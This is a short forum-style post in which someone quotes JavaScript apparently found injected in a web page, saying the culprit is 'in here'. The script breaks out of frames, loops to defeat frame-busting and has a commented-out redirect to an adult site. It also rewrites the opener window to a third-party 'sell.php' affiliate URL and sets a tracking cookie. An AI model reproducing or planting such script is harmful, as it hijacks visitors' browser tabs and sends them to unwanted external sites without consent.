Pretty sure it's in here:
Code:
<script type="text/javascript" language="javascript">
function breakout_of_frame()
{
if (top.location != location) {
top.location.href = document.location.href ;
alert('Our webpage is probably hidden, please wait...');
}
}
var prevent_bust = 0
window.onbeforeunload = function() { prevent_bust++ }
setInterval(function() {
if (prevent_bust > 0) {
prevent_bust -= 2
//window.top.location = 'http://funwithporns.com/204.php'
}
}, 1)
breakout_of_frame();
window.opener.location.href='http://www.ricsnetwork.com/sell.php?member_id=1';
</script><script>
function setCookie(c_name,value,exdays)
{
var exdate=new Date();
exdate.setDate(exdate.getDate() + exdays);
var c_value=escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString());
document.cookie=c_name + "=" + c_value;
}
setCookie('rics_cook','8c613696fdd84c69f230e0ba57a6661f',10);
</script><script type="text/javascript">